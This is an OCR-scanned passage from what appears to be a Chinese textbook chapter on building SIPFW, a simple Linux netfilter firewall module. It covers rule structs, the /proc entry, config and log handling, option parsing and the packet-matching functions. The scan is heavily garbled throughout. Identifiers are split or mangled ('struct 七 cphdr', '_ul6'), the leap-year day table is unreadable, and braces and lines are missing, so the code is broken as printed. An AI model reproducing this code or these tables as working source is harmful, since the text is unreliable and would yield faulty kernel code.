struct icgmp flag /*ICMP 和 IGMP 结构 */ 


{ 


_u8valid; /* 有 效 性 */ 

_u8type; /* 类 型 */ 

_u8code; /* 代 码 */ 

}; 
struct tcp flag /*TCP 选项 * / 
{ 

_ul6 resl:4, /* 未 用 */ 
doff:4, /* 未 用 */ 
fin:1, /* 结 束 */ 
syn:1, /* 建 立 连接 */ 
rst:1, /* 重 置 */ 
psh:1, /* 未 用 */ 
ack:1, /* 响 应 */ 
urg:1, /* 未 用 */ 
ece:1， /* 未 用 */ 
Curtls /* 示 用 */ 

u8 valid; /* 有 效 */ 


Ls 

上 述 结构 中 的 tcp_flag 和 icemp_flag 的 结构 使 用 了 同一 块 内 存 , 这 在 具体 实现 规则 判定 
的 时 候 很 重要 ， 但 也 假定 了 只 能 一 条 规则 包含 一 个 附加 项 ， 如 图 20.14 所 示 为 在 内 存 中 的 
示意 图 。 在 使 用 的 时 候 , 判定 是 否 附 加 项 有 效 可 以 直接 判定 addtion 的 valid 成 员 是 否 有 效 ， 
当 有 效 的 时 候 进 行 匹 配 ， 否 则 跳 过 就 可 以 了 。 


20.6.5 ”SIPFW 防火 墙 的 PROC 虚拟 文件 系统 


在 SIPFW 防火 墙 中 建立 了 一 个 PROC 虚拟 文件 系统 ， 主 要 向 用 户 提供 基本 的 防火 墙 
信息 ， 如 日 志文 件 的 路 径 、 规 则 文件 的 路 径 、 默 认 动 作 、 规 则 命中 的 情况 等 信息 。SIPFW 
中 PROC 文件 系统 位 于 网 络 部 分 ， 即 “/proc/net/” 目 录 下 ， 建 立 了 目录 sipfw， 在 下 面 的 


.654 。 
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struct tcp_flag 


syn | fin valid 


struct icgmp_flag 


valid type code 


valid 


addtion 


图 20.14 ”附加 项 的 联合 结构 示意 图 
information 文件 中 为 用 户 的 信息 , 即 防火 墙 系统 的 信息 文件 为 “/proc/net/sipfw/information”。 
SIPFW 防火 墙 系统 的 PROC 虚拟 文件 在 模块 初始 化 的 时 候 建立 , 在 模块 退出 的 时 候 删 
除 。 建 立 的 时 候 先 建立 目录 “/proc/net/sipfw”， 然后 建立 information 文件 。 
sipfw proc dir = proc mkdir("sipfw", Proc net); 
/* 在 /proc/net 下 建立 sipfw 目录 */ 
Sipfw proc info = create proc entry( "information", 0644, sipfw_ 
proc dir ); /* 信 息 项 */ 
这 样 再 建立 虚拟 文件 “/proc/net/sipfw/information”， 删除 过 程 与 此 相反 。 


remove proc entry("information", sipfw proc dir); 
remove_proc entry("sipfw", proc net); 


20.6.6 SIPFW 防火 墙 的 配置 文件 和 日 志文 件 处 理 


在 内 核 中 进行 文件 处 理 比较 麻烦 ， 所 以 对 内 核 中 的 文件 函数 进行 包装 。 主 要 实现 如 下 
的 文件 函数 : 


extern struct file *#*SIPFW OpenFile(const char *filename,  /* 打 开 文件 */ 


int flags, /* 模 式 */ 
int mode); 
extern ssize t SIPFW ReadLine(struct file *f, /* 从 文件 中 读 取 一 行 */ 
char *buf, /* 保 存 数据 的 缓冲 区 */ 
size t len); /* 缓 冲 区 大 小 */ 
extern ssize t SIPFW WriteLine(struct file *f, /* 向 文件 中 写 入 一 行 #/ 
char *buf, /* 数 据 缓 冲 区 */ 
size t len); /* 数 据 大 小 */ 
extern void SIPFW CloseFile(struct file *f); /* 关 闭 文件 */ 


1. 防火 墙 的 配置 文件 


在 SIPFW 内 核 模块 初始 化 的 时 候 ， 要 从 配置 文件 sipfw.conf 中 读 取 数据 ， 并 解析 获得 
配置 信息 。 例 如 ， 一 个 配置 文件 如 下 所 示 。 


#test file 
DefaultAction=ACCEPT 


RulesFile=/etc/sipfw.rules 
LogFile=/etc/sipfw.log 


“Se 


析 用 户 


文件 中 。 
志 记录 的 格式 为 : 
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条 


Ws 


上 面 的 内 核 文件 函数 ， 每 次 从 配置 文件 读 取 一 行 ， 分 别 解析 关键 字 DefaultAction 
获得 默认 动作 名 称 、RulesFile 规则 文件 名 称 、LogFile 日 志文 件 路 径 名 称 。 


为 了 保存 用 户 的 配置 信息 ， 建 立 一 个 如 下 结构 的 变量 cf， 保 存 用 户 的 上 述 信息 。 当 分 


struct sipfw conf { 

u32 DefaultAction; 

u8 RuleFilePath[256]; 
u8 LogFilePath[256]; 


int HitNumber; 
int Invalid; 
int LogPause; 


}; 


的 配置 文件 信息 失败 时 ， 会 用 系统 默认 的 配置 信息 代替 。 


/* 服 务 器 配置 信息 */ 
/* 默 认 动 作 */ 

/*# 规 则 文件 路 径 */ 
/* 配 置 文 件 路 径 */ 
/* 规 则 命中 数量 */ 
/* 防 火 墙 是 否 有 效 */ 
/* 配 置 文件 中 止 */ 


struct sipfw conf cf={SIPFW ACTION ACCEPT, "/etc/sipfw.rules","/etc/sipfw. 


1o0g", 0,0,0}; 


2. 防火 墙 的 日 志文 件 


为 了 便于 用 户 查询 防火 墙 规则 命中 情况 ,SIPF W 可 以 将 网 络 数据 的 过 滤 情 况 写 入 日 志 


日 志 的 路 径 在 配置 文件 中 指明 ， 和 否则 就 会 将 数据 写 入 文件 “/etc/sipfw.log” 中 。 日 


from [IP:port] to [IP:port] Protocol [string] was [Action name] 


表示 从 哪个 主机 到 哪个 主机 什么 协议 的 网 络 数据 被 规则 的 动作 处 理 了 ， 例 如 : 


Time: 2013-6-11 13:37:27 From 127.0.0.1 To 127.0.0.1 tcp PROTOCOL was DROPed 


要 生成 以 上 的 信息 可 以 使 用 如 下 函数 构建 字符 串 : 


/* 构 造 写 入 日 志文 件 的 数据 信息 */ 
snprintf (buff, 


“Os 


2048, 

"Time: %04d-%$02d-%02d " 
"%02d:%02d:%02d " 

"From %d.%d.%d.%d " 

"To %d.%d.%d.%d " 

" %s PROTOCOL " 

"was Ssed\n", 

Cur.year, cur.mon, cur.mday, 
cur .hour， cur.min, cur.sec, 
(iph->saddr & 0x000000FF)>>0, 


(iph->saddr & 0x0000FF00) >>8， 
(iph->saddr & 0x00FF0000) >>16， 
(iph->saddr & OxFF000000)>>24, 
(iph->daddr & 0x000000FF) >>0， 
(iph->daddr & 0x0000FF00) >>8， 
(iph->daddr & 0x00FF0000) >>16， 
(iph->daddr & 0xFF000000)>>24, 


(char*)proto->ptr, 


/* 信 息 缓冲 区 */ 

/* 缓 冲 区 长 度 */ 

/* 日 期 的 年 月 日 */ 
/* 日 期 的 时 分 秒 */ 
/* 来 源 IP*/ 

/* 目 的 IP*/ 

/* 协 议 类 型 */ 

/* 处 理 方式 动作 */ 
/* 年 月 日 */ 
/* 时 分 秒 */ 

/* 源 地 址 第 一 段 */ 
/* 源 地 址 第 二 段 */ 
/* 源 地 址 第 三 段 */ 
/* 源 地 址 第 四 段 */ 
/* 目 的 地 址 第 一 段 */ 
/* 目 的 地 址 第 二 段 */ 
/* 目 的 地 址 第 三 段 */ 
/* 目 的 地 址 第 四 段 */ 
/* 协 议 名 称 */ 
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(char*) sipfw action name[r->action] .ptr); /* 动 作 名 称 */ 


将 字符 串 写 入 日 志文 件 ， 需 要 打开 日 志文 件 ， 然 后 调用 上 述 写 入 一 行 到 文件 的 函数 
SIPFW_WriteLine()， 将 数据 写 入 日 志文 件 中 ， 最 后 将 日 志 关 闭 。 在 打开 文件 的 时 候 注 意 需 
要 将 日 志文 件 的 模式 设置 为 O_CREATIO_RDWRIO_APPEND， 即 可 以 读 写 O_RDWR， 
写 入 时 在 尾部 增加 防止 覆盖 原来 的 记录 O_APPEND, 并 且 如 果 日 志文 件 不 存在 会 创建 一 个 
O_CREAT。 

由 于 日 志 记 录 必 须 有 发 生 的 时 间 ， 而 内 核 中 没有 现成 的 函数 可 以 调用 《〈 像 应 用 层 的 
ctime() 函 数 类 一 样 )。 内核 中 只 有 产生 当前 从 1970.01.01 的 秒 为 单位 的 时 间 , 可 以 通过 函数 
get_seconds() 函 数 获得 当前 的 秒 数 。 为 了 构建 可 以 识别 的 日 期 形式 ， 需 要 自己 写 一 个 。 

为 了 方便 计算 ， 使 用 查 表 法 计算 当前 秒 的 年 月 日 时 分 秒 。 基 本 方法 是 获得 各 个 年 第 一 
天 之 前 到 1970 年 元 时 的 天 数 ， 例 如 1970 年 的 天 数 为 0， 这 样 可 以 获得 当前 的 年 数 。 使 用 
类 似 的 方法 ， 构 建 一 年 内 某 月 第 一 天 之 前 的 天 数 ， 可 以 获得 当前 的 月 数 。 剩 余 的 天 数 即 为 
当前 月 份 日 期 。 

下 面 的 代码 是 2010 一 2015 年 到 计时 元 年 (1970) 的 天 数 ， 仅 仅 提供 了 2010 一 2015 年 。 


ul6 days since epoch[] = 
出 


/* 2010 - 2015 */ 
14610,14975, 15340, 15706,16071,16436 
}; 


一 年 中 某 天 的 月 份 分 为 头 年 和 非 半年 ， 如 下 所 示 。 


_ ul16 days_ since year[] = { /* 某 月 在 一 个 正常 年 中 开始 的 天 数 */ 
0, 31, 59, 90; 120, 151, 181, 212, 243; 273, 304, 334, 
] 


_ ul16 days_since leapyear[] = { /* 某 月 在 一 个 润 年 中 开始 的 天 数 */ 
Oi 60 on ol 2 1027 23 244. 27140 905 3357 

}; 

至 于 剩余 的 时 、 分 、 秒 十 分 容易 计算 ， 可 以 用 整除 、 求 余 的 方法 获得 当前 的 小 时 、 分 
钟 和 秒 数 。 

20.6.7 SIPFW 防火 墙 的 过 滤 模 块 设计 

由 于 SIPFW 防火 墙 的 功能 设计 得 比较 简单 , 过 滤 模 块 只 要 对 符合 用 户 规则 的 数据 进行 
判定 ， 让 网 络 数据 通过 或 者 将 数据 丢弃 就 可 以 了 。 所 以 防火 墙 的 主要 工作 在 于 对 规则 匹配 
性 的 判定 上 。 

要 判定 一 个 规则 和 网 络 的 输入 数据 是 否 匹 配 ， 需 要 判定 来 源 IP 地 址 、 目 的 IP 地 址 和 
协议 类 型 ， 如 果 以 上 条 件 是 符合 的 ， 则 对 来 源 端口 和 目的 端口 进行 判定 ， 并 根据 是 否 存在 
附加 项 来 判断 附加 项 是 否 匹 配 。 如 果 网 络 数据 和 规则 匹配 ， 则 按照 规则 定义 的 动作 对 网 络 
数据 进行 丢弃 或 者 让 网 络 数据 通过 防火 墙 。 

1. 防火 墙 使 用 的 netfilter 回调 函数 

SIPFW 防火 墙 的 过 滤 模 块 使 用 netfilter 框架 中 的 钧 子 来 实现 , 要 能 够 使 用 SIPFW 的 过 


“ye 
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滤 模 块 ， 需 要 将 过 滤 函 数 挂 载 到 钧 子 函数 上 。 回 调 函 数 的 原型 为 : 


typedef unsigned int nf hookfn (unsigned int hooknum, /* 挂 接点 */ 


struct sk buff **skb, /* 网 络 数据 */ 
const struct net device *in, /* 进 入 的 网 络 接口 */ 
const struct net device *#out, /* 目 的 网 络 接 口 */ 


int (*okfn) (struct sk buff *#)); 
其 中 的 网 络 数据 存放 在 参数 skb 中 ， 它 是 一 个 struct sk_buff 结构 ， 如 果 要 获得 截取 的 
网 络 数 据 的 信息 ， 需 要 分 析 这 个 结构 。 结 构 的 原型 如 下 : 


struct sk buff { 
/* These two members must be first. */ 


struct skibuff *next; /* 下 一 个 结构 */ 

struct sk buff *prev; /* 前 一 个 结构 */ 

union { /* 网 络 层 #/ 
struct iphdr *iph; /*IP 头 部 */ 


} nh; 


unsigned int data len, /* 数 据 长 度 */ 
unsigned char *data, /*IP 开始 的 数据 段 */ 


2. IP 头 部 结构 的 定义 


通过 struct sk_buff 结构 的 nh 枚 举 的 iph 成 员 变量 ， 可 以 获得 IP 的 头 部 结构 ， 通 过 IP 
的 头 部 结构 可 以 获得 网 络 数据 的 源 人 P 地 址 、 目 的 IP 地 址 和 协议 类 型 。struct iphdr 结构 的 
原型 如 下 : 


struct iphdr 


{ 
unsigned int ihl:4; /* 头 部 长 度 ,单位 32 位 */ 
u int8 t protocol; /* 协 议 类 型 */ 
u int32 t saddr; /* 源 地 址 */ 
u int32 t daddr; /* 目 的 地 址 */ 


] 7 


3. IP 地 址 的 匹配 方法 


IP 头 部 结构 struct iphdr 的 参数 saddr 为 源 卫 地 址 、daddr 为 目的 人 P 地 址 、protocol 为 
网 络 数据 的 协议 类 型 。 通 过 iphdr 结构 可 以 判定 卫 地 址 和 协议 类 型 与 规则 的 匹配 情况 。 判 
定 匹 配 的 方式 如 下 : 


if((iph->daddr == r->dest|| r->dest == 0) /* 目 的 地 址 */ 


a 
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&& (iph->saddr==r->source|| r->source == 0) /* 源 地 址 */ 

&&( iph->protocol== r->protocol || r->protocol == 0) ) /* 协 议 */ 
| 

found = 1; /* 匹 配 */ 


} 

如 果 要 进行 进一步 的 端口 和 附加 项 的 匹配 , 则 需要 获得 IP 的 负载 部 分 , 即 应 用 层 协 议 
的 头 部 部 分 。IP 的 负载 部 分 在 IP 头 部 数据 之 后 ，IP 头 部 的 长 度 由 参数 ihl 计算 可 以 得 到 
(ihl*4)。IP 层 的 数据 开始 部 分 由 结构 struct sk_bu 任 的 data 变量 指定 ， 所 以 传输 层 协议 的 头 
部 地 址 为 : 


struct sk buff *skb; 
char *payload = skb->data + skb->nh.iph->ihl*4; 


4. 协议 类 型 的 匹配 方法 

获得 传输 层 的 头 部 地 址 之 后 ， 根 据 IP 头 部 的 协议 类 型 可 以 将 IP 的 负载 部 分 转换 为 不 
同 的 协议 ， 然 后 进行 匹配 性 计算 。 例 如 TCP 判定 如 下 ， 需 要 先 判定 端口 的 匹配 性 然后 判定 
附加 项 的 匹配 性 : 


struct tcphdr *tcph = (struct tcphdr *)data; 


if( (tcph->source == r->sport || r->sport == 0) /* 端 口 *#/ 
&& (tcph->dest == r->dport || r->dport == 0)) 
{ 
if(!r->addtion.valid) /* 规 则 中 不 存在 标志 位 */ 
{ 
found = 1; /* 匹 配 */ 
} 
else /* 存 在 标志 位 */ 
/* 判 断 TCP 头 部 的 标志 位 */ 
struct tcp flag *tcpf = &r->addtion.tcp; 
if (tcpf->ack == tcph->ack /*ACK/SYN*/ 
&&tcpf->fin == tcph->fin /*FIN*/ 
&&tcpf->syn == tcph->syn) /*SYN*/ 
{ 
found = 1; /* 匹 配 */ 
和 
1 
| 


UDP 的 匹配 性 计算 ， 只 需要 计算 端口 是 否 一 致 就 行 了 。 


struct tcphdr *udph = (struct 七 cphdr *)data; 
if( (udph->source == r->sport || r->sport == 0) 
&& (udph->dest == r->dport || r->dport == 0)) 
i 
found = 1; 
} 


由 于 ICMP 和 IGMP 头 部 结构 的 前 两 个 项 类 型 和 代码 的 位 置 是 一 致 的 ， 所 以 这 两 个 协 
议 只 需要 判定 一 种 就 可 以 了 。 


struct igmphdr *igmph = (struct igmphdr*)data; 
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if(!r->addtion.valid) /* 不 存在 类 型 */ 
L 
found = 1; 
} 
else /* 存 在 类 型 #/ 


{ 
struct icgmp flag *impf = &r->addtion.icgmp; 
if (impf->type == igmph->type && impf->code == igmph->code) 


found = 1; /#* 符 合 */ 


20.7 SIPFW 防火 墙 各 功能 模块 的 实现 


前 面 对 SIPFW 防火 墙 的 需求 和 实现 的 关键 问题 的 框架 进行 了 介绍 , 本 节 将 对 主要 的 代 
码 进 行 介绍 ， 主 要 包含 应 用 层 的 命令 解析 、 应 用 层 的 消息 收发 、 内 核 层 的 规则 处 理 代码 、 
网 络 数据 的 截取 代码 、proc 文件 系统 代码 和 配置 文件 解析 代码 。 

20.7.1 SIPFW 防火 墙 的 命令 解析 代码 

命令 行 解析 函数 将 用 户 输入 的 命令 转化 为 内 核 可 以 理解 的 命令 字 。 

1. 命令 行 解析 函数 

(1) 对 用 户 命令 进行 解析 的 函数 先 建立 命令 选项 匹配 结构 ， 包 括 长 参数 和 短 参 数 ， 以 
方便 之 后 使 用 getopt_long() 函 数 进行 处 理 。 

static int 

SIPFW_ParseCommand (int argc, char *argv[], struct sipfw cmd_ opts *cmd _ opt) 

{ 


DBGPRINT ("==>SIPFW_ ParseCommand\n"); 
struct option longopts[] = 


{ /* 长 选项 #/ 

{"source", required argument NULL, 's'},/V* 源 主机 IP 地 址 */ 
{"dest", required argument, NULL, 'd'},/V* 目 的 主机 IP 地 址 */ 
{"sport", required argument, NULL, 'm'},/* 源 端口 地 址 */ 
{"dport", required argument， NULL，  'n'"j,/* 目 的 端口 地 址 */ 
{"protocol", required argument，，NULL， 'p'},/* 协 议 类 型 */ 
{"1list", optional argument， NULL， "LL'},/* 规 则 列表 */ 
{"flush", optional argument， NULL， 'F'},/* 清 空 规则 */ 
{"append", required argument, NULL, by 

/* 增 加 规则 到 链 尾部 */ 
{"insert", required argument, NULL, ' 工 ' },/* 向 链 中 增加 规则 */ 
{"delete", required argument, NULL, 'D"'},/# 删 除 规则 */ 
{"interface", required argument, NULL, "5} yx，V/* 网 络 接口 */ 
{"action®, required argument, NULL, 吓 '} 1/# 动 作 #/ 
ay no_argument， NULL, 'y'},/* 同 步 #/ 
En no_argument, NULL, ' 工 ' },/* 连 接 复位 */ 
{"acksyn", no_argument, NULL, 'k' },/* 同 步 确认 应 答 */ 
i no_argument, NULL, 'f'},/* 终 结 */ 


= 
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{"number", required argument, NULL, i 
/# 删 除 或 者 插入 的 位 置 */ 
{0, 0, 0, 0}, 
static char opts short[] = "s:d:m:n:p:LFA:I:D:i:j:yrkfu:"; 
/* 短 选项 */ 
static char *] opt arg = NULL; /* 长 选项 的 参数 */ 


(2) 对 用 户 输入 参数 的 处 理 ， 主 要 进行 映射 字符 的 匹配 ， 然 后 对 匹配 项 后 面 的 参数 进 
行 分 析 ， 匹 配 项 后 面 的 参数 放 在 全 局 变量 optarg 中 。 


char c = 0; 


while ((c= getopt long(argc, argv, opts_short, longopts, NULL)) != -1) 
上 
Switch(c) 
case 's': /* 源 主机 IP 地 址 */ 
1 opt arg = optarg; 
if(l1 opt arg && 1 opt arg[0]!=':'){ 
SIPFW ParseOpt (SIPFW OPT IP, optarg, &cmd opt->source); 
} 
break; 
case 'd': /* 目 的 主机 IP 地 址 */ 
1 opt arg = optarg; 
if(l opt arg && 1 opt arg[0]!="':'){ 
SIPFW_ ParseOpt (SIPFW_OPT_IP, optarg, &cmd opt->dest); 
} 
break; 
case 'm': /* 源 端口 地 址 */ 


1 opt arg = optarg; 
if(1 opt arg && 1 opt arg[0]!="':"'){ 

SIPFW_ ParseOpt (SIPFW_OPT PORT, optarg, &cmd opt->sport); 
} 


break; 

case 'n': /* 目 的 端口 地 址 */ 
1_opt_arg = optarg; 
if(l opt arg && 1 opt arg[0]!=':'){ 


SIPFW ParseOpt (SIPFW OPT _ PORT, optarg, &cmd opt->dport); 
} 


break; 

case 'p': /* 协 议 类 型 */ 
1 opt arg = optarg; 
if(1 opt arg && 1 opt arg[0]!=':'){ 


SIPFW ParseOpt (SIPFW OPT PROTOCOL, optarg, &cmd opt-> 
protocol); 

} 

break; 


FE /* 规 则 列表 命令 类 型 为 SIPFW_CMD_LIST */ 
cmd_ opt->command.v uint = SIPFW CMD LIST; 
1 opt arg = optarg; 


if(1 opt arg && 1 opt arg[0]!=':'){ 
SIPFW ParseOpt (SIPFW OPT_ CHAIN, optarg, &cmd opt-> 
chain); 
} 
break; 
cane Rms 


»661* 


第 4 篇 综合 案例 


/* 清 空 规则 , 命令 类 型 为 SIPFW_CMD_FLUSH */ 
cmd_ opt->command.v uint = SIPFW CMD FLUSH; 
1 opt arg = optarg; 


if(l1 opt arg && 1 opt arg[0]!=':'){ 
SIPFW ParseOpt (SIPFW OPT CHAIN, optarg, &cmd opt-> 
chain); 
} 
break; 
case 'A': 


/* 增 加 规则 到 链 尾部 , 命令 类 型 为 SIPFW_CMD_APPEND */ 
cmd_ opt->command.v uint = SIPFW CMD APPEND; 
1 opt arg = optarg; 


if(l1 opt arg && 1 opt arg[0]!=':'){ 
SIPFW ParseOpt (SIPFW _ OPT _ CHAIN, optarg, &cmd opt-> 
chain); 
上 
break; 
Case 'I': 


/* 向 链 中 增加 规则 , 命令 类 型 为 SIPFW_CMD_INSERT */ 
cmd_opt->command.v uint = SIPFW_ CMD INSERT; 
1 _ opt arg = optarg; 


if(l1 opt arg && 1 opt arg[0]!=":"){ 
SIPFW ParseOpt (SIPFW _ OPT _ CHAIN, optarg, &cmd opt-> 
chain); 
} 
break; 
case 1D1: 


/* 删 除 规则 , 命令 类 型 为 SIPFW_CMD_DELETE */ 
cmd opt->command.v uint = SIPFW CMD DELETE; 
1 opt arg = optarg; 


if(l1 opt arg && 1 opt arg[0]!="':"'){ 
SIPFW ParseOpt (SIPFW OPT CHAIN, optarg, &cmd opt-> 
chain); i 
j 
break; 
case "i': /* 网 络 接口 */ 
1 opt arg = optarg; 
if(l opt arg && 1 opt arg[0]!="':'){ 
SIPFW ParseOpt (SIPFW OPT STR, optarg, é&cmd opt-> 
ifname); 
} 
break; 
case 'j': /* 动 作 */ 
1 _ opt arg = optarg; 
if(l opt arg && 1 opt arg[0]!="':'){ 
SIPFW ParseOpt (SIPFW_ OPT ACTION, optarg, &cmd opt-> 
action); 
} 
break; 
default: 
break; 


} 
} 
DBGPRINT ("<==SIPFW ParseCommand\n"); 


“oh. 


} 


2. 


第 20 章 一 个 简单 防火 墙 的 例子 SIPFW 


命令 行 解析 通用 数据 结构 


对 命令 行 选项 的 处 理 按照 类 型 可 以 分 为 字符 串 匹 配 、IP 地 址 转换 、 网 络 端 口 转换 、 字 
符 串 直 接 复制 ， 它 们 的 计算 方法 是 不 一 致 的 。 对 于 字符 串 匹 配 主 要 是 对 一 个 向 量 类 型 的 变 
量 进行 比较 ， 向 量 类 型 的 定义 如 下 : 


typedef struct vec { /* 向 量 结构 定义 */ 
void *ptr; /* 字 符 串 */ 
unsigned long len; /* 长 度 */ 
int value; /* 向 量 字符 串 对 应 的 值 */ 
}vec; 


向 量 类 型 中 ptr 存放 了 匹配 的 字符 串 名 称 ，len 为 字符 串 的 长 度 ，value 为 此 向 量 中 字 
符 串 对 应 的 值 。 进 行 字符 串 匹 配 计算 的 时 候 ， 比 较 ptr 的 字符 串 匹 配 之 后 ， 从 value 中 将 字 
符 串 的 值 取出 。 

3. 命令 行 选项 计算 


下 面 是 对 命令 选项 进行 计算 的 代码 ， 根 据 用 户 输入 的 不 同类 型 的 命令 类 型 ， 在 各 个 链 
中 进行 名 字 的 查找 ， 并 进行 相应 的 计算 。 


口 


口 


口 


口 


操作 选项 SIPFW_OPT_CHAIN: 表示 所 分 析 的 关键 字 是 一 个 链 的 名 称 。 这 时 会 比 
较 链 名 称 和 输入 的 变量 ， 根 据 用 户 输入 链 的 名 称 找到 对 应 的 表示 值 。 

操作 选项 SIPFW_OPT_IP: 表示 所 分 析 的 关键 字 是 一 个 字符 串 类 型 的 IP 地 址 。 这 
时 会 将 字符 串 IP 地 址 转换 为 网 络 字 节 序 的 IP 地 址 。 

操作 选项 SIPFW_OPT_ PORT: 表示 所 分 析 的 关键 字 是 一 个 字符 串 类 型 的 端口 地 
址 。 这 时 会 将 字符 串 端口 地 址 转换 为 网 络 字 节 序 的 端口 地 址 。 

操作 选项 SIPFW_OPT_STR: 表示 所 分 析 的 关键 字 是 一 个 字符 串 。 这 时 会 将 字符 
串 进行 复制 。 


/* 解 析 命令 选项 */ 


static int SIPFW_ParseOpt (int opt, char *str, union sipfw variant *var) 


{ 


DBGPRINT ("==>SIPFW ParseOpt\n"); 


switch (opt) 
{ 
case SIPFW OPT CHAIN: /* 链 名 称 */ 
if(str){t 


for(i = 0;i<SIPFW_CHAIN NUM;i++) { /* 人 遍历 链 查找 匹配 项 #/ 
if(!strncmp (str, sipfw chain name[i].ptr, sipfw chai- 
n name[i].len)){ 
chain = i; 


break;} 
} 
1 
Var->v uint = chain; 
break; 
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case SIPFW OPT IP: /* 将 字符 串 转 为 网 络 字 节 序 */ 
4f(str) 
ip = inet addr(str); 
var->v uint = ip; 
break; 


case SIPFW OPT PORT: /* 将 字符 串 类 型 转 为 网 络 序 */ 
4FE(gtr) 二 
port = htons (strtoul (str, NULL, 10)); } 
var->V_uint = port; 
break; 


case SIPFW OPT STR: /* 字 符 串 直 接 复制 */ 
Et 
int len = strlen(str); 
memset (var->v str, 0, sizeof (var->V str)); 
if(len < 8){ 
memcpy (var->v_str, str, len); } 
1 
break; 
default: 
break; 


加 
DBGPRINT ("<==SIPFW_ ParseOpt\n"); 


20.7.2 SIPFW 防火 墙 的 过 滤 规 则 解析 模块 代码 


SIPFW 防火 墙 的 规则 匹配 代码 在 一 条 链 上 查找 所 有 的 规则 , 与 截取 的 网 络 数据 进行 匹 
配 性 计算 ， 直 到 找到 一 个 匹配 项 或 者 规则 到 达 链 的 末尾 。 在 开始 遍历 链表 之 前 先 查看 链表 
是 否 为 空 ， 如 果 为 空 则 退出 。 为 了 减少 匹配 计算 的 计算 量 ， 先 将 网 络 数据 的 IP 头 部 和 负载 
部 分 进行 计算 。 匹 配 计算 如 果 技 到 匹配 规则 ， 就 将 此 规则 指针 返回 ， 否 则 返回 空 指针 。 

1 规则 判断 函数 

匹配 的 主要 过 程 为 先 判 断 源 地 址 、 目 的 下 地 址 和 协议 类 型 是 否 匹配 ， 再 判断 端口 
和 附加 项 的 匹配 情况 。 

/* 判 断 网 络 数据 和 一 条 链 上 的 规则 是 否 匹 配 */ 


struct sipfw rules * SIPFW IsMatch(struct sk buff *skb,struct sipfw_rules *1) 
' 


struct sipfw rules *r = NULL; /* 规 则 */ 

struct iphdr *iph = NULL; /*IP 头 部 */ 

void *p = NULL; /* 网 络 数据 负载 */ 

int found = 0; /* 是 否 匹 配 */ 

if(1 = NULL) { /* 链 为 空 直接 退出 */ 
goto EXITSIPFW IsMatch; 

} 

iph = skb->nh.iph; /* 找 到 IP 头 部 */ 

P = skb->data + skb->nh.iph->ihl*4; /* 负 载 部 分 */ 

for( = 1; r != NULL; r = r->next) /* 在 链 上 循环 匹配 规则 */ 


{ 
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if(SIPFW IsIPMatch(iph, r)) /*IP 是 否 匹配 */ 
{ 
if(SIPFW IsRddtionMatch (iph,p,r))  /* 附 加 数据 是 否 匹配 */ 
{ 
found = 1; /* 匹 配 */ 
break; 


l 
EXITSIPFW IsMatch: 


return found?r:NULL; 


} 


2. IP 地 址 匹配 函数 

IP 地 址 和 协议 类 型 的 匹配 比较 简单 ， 当 规则 中 的 IP 地 址 项 和 协议 类 型 项 的 值 为 0 的 
时 候 表示 全 部 都 会 匹配 ， 否 则 需要 相应 项 的 值 相 等 。 

/* 匹 配 网 络 数据 和 规则 中 的 IP 地 址 及 协议 是 否 匹 配 */ 


static int SIPFW IsIPMatch(struct iphdr *iph, struct sipfw rules *r) 
| 


int found = 0; 
DBGPRINT ("==>SIPFW IsIPMatch\n"); 


if((iph->daddr == r->dest|| r->dest == 0) /* 目 的 地 址 */ 
&& (iph->saddr==r->source|| r->source == 0) /* 源 地 址 */ 
&&( iph->protocol== r->protocol || r->protocol == 0))/* 协 议 */ 
found = 1; /* 匹 配 */ 


DBGPRINT ("<==SIPFW IsIPMatch\n"); 
return found; 


3. 附加 项 匹配 函数 


端口 地 址 和 附加 项 的 匹配 分 为 TCP、UDP 和 ICMP、IGMP，UDP 的 匹配 仅仅 需要 计 
算 端 口 地 址 是 否 匹 配 ,匹配 的 原则 与 IP 地 址 一 致 , 即 规则 项 为 0 表示 匹配 全 部 的 端口 地 址 ， 
否则 需要 端口 相等 。 对 于 TCP 项 的 匹配 需要 计算 端口 和 标志 位 ， 目 前 仅 支持 SYN 和 FIN 
标志 符 的 匹配 , 标志 位 的 匹配 计算 要 完全 相等 。 对 于 ICMP 和 IGMP 可 以 使 用 同一 个 算法 ， 
比较 类 型 和 代码 是 否 相等 。 


/* 判 断 网 络 数据 和 规则 的 附加 项 是 否 匹 配 
包含 端口 号 、TCP 的 标志 位 、ICMP/IGMP 类 型 代码 
参数 : 
iph 为 IP 头 部 指针 
data 为 IP 的 负载 
r 为 规则 
wi 
static int SIPFW IsAddtionMatch(struct iphdr *+iph， void *data, struct 
Sipfw_ rules *r) 
‘ 
int found = 0; 
DBGPRINT ("==>SIPFW IsAddtionMatch\n"); 
Switch (iph->protocol) 
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case IPPROTO_TCP: /*TCP 协议 中 判断 端口 和 标志 位 */ 
struct tcphdr *tcph = (struct tcphdr *)data; 
if( (tcph->source == r->sport || r->sport == 0) /* 端 口 */ 
&& (tcph->dest == r->dport || r->dport == 0)){ 
if(!r->addtion.valid) /+ 规则 中 不 存在 标志 位 */ 
found = 1; /*#* 匹 配 */ 
elsel{ /* 存 在 标志 位 */ 
/* 判 断 TCP 头 部 的 标志 位 */ 
struct tcp flag *tcpf = &r->addtion.tcp; 
if (tcpf->ack == tcph->ack /* 同 步 确认 应 答 */ 


&&tcpf->fin == tcph->fin /* 终 结 */ 
&&tcpf->syn == tcph->syn)  /* 同 步 */ 


found = 1; /*#* 匹 配 */ 
上 
} 
break; 
case IPPROTO UDP: /*UDP 协议 判断 端口 */ 
struct 七 cphdr *udph = (struct 七 cphdr *)data; 
if( (udph->source == r->sport || r->sport == 0) 
&& (udph->dest == r->dport || r->dport == 0)) 
found = 1; 
break; 
case IPPROTO ICMP: /*ICMP 判断 类 型 和 代码 */ 
case IPPROTO IGMP: /*IGMP 判断 类 型 和 代码 */ 
struct igmphdr *igmph = (struct igmphdr*)data; 
if(!r->addtion.valid) /* 不 存在 类 型 */ 
found = 1; 
else /* 存 在 类 型 */ 


' 
struct icgmp flag *impf = &r->addtion.icgmp; 


if (impf->type == igmph->type && impf->code == igmph->code) 


found = 1; /* 符 合 */ 
} 
} 
break; 
default: /* 其 他 不 符合 */ 
found = 0; 
break; 


} 
DBGPRINT ("==>SIPFW IsAddtionMatch\n"); 


return found; 


20.7.3 ”SIPFW 防火 墙 的 网 络 数据 拦截 模块 代码 


SIPFW 防火 墙 的 网 络 数据 拦截 模块 利用 NETFILTER 架构 的 钩子 框架 ， 在 模块 开始 的 
时 候 注 册 两 个 钧 子 函数 ， 分 别处 理 到 达 本 机 的 网 络 数据 和 从 本 机 发 出 的 网 络 数据 。 


